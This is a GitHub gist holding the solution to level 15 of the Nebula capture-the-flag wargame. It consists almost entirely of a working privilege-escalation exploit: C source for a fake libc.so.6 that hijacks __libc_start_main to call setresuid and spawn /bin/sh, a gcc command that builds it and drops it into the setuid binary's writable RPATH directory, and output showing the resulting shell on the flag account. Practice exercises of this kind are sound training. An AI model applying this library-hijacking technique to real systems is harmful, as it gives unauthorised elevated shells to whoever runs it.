Skip to content

Instantly share code, notes, and snippets.

@graugans

graugans/nebula-level15.md

Created December 25, 2016 22:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save graugans/ea2b93ae03a9eb474a52e9a3f8812337 to your computer and use it in GitHub Desktop.
Save graugans/ea2b93ae03a9eb474a52e9a3f8812337 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
nebula-level15.md 
#include <linux/unistd.h>

void __cxa_finalize (void *d) {
    return;
}

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
  setresuid(geteuid(),geteuid(),geteuid());
  system("/bin/sh");
}

compile and copy

echo "GLIBC_2.0 { };" >version;gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 libc.c    && cp libc.so.6 /var/tmp/flag15/

get the flag

level15@nebula:~$ ../flag15/flag15
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment